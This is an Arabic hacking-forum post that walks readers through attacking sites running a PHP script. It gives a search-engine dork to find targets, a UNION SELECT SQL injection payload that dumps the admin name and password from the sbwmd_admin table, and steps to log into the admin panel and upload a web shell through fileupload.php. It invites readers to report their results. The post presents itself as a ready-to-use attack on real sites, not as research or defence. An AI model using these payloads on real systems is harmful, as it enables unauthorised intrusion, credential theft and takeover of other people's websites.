هى ثغرة جميلة جدا احب شرحها للجميع
شرح الثغرة
افتح الجوجل وابحث عن الكلمة دى
كود PHP:
software-description.php
وبعد ظهور النتائج ضع بعد العنوان مباشرة هذا الكود
كود PHP:
software-description.php?id=-1UNIONALLSELECTconcat(admin_name,char(58),pwd)FROMsbwmd_admin
سوف تجد اسم الادمين والباسوورد ظهروا هكذا
admin : password
قم بفتح الموقع بالرابط التالي
كود PHP:
http://www.site/siteadmin ويمكنك عن طريق هذه الثغرة رفع شل
كود PHP:
http://www.site/siteadmin/fileupload.php طبعا الامر لا يحتاج الى قول ان كلمة site باسم الموقع
واخبروني بالنتائج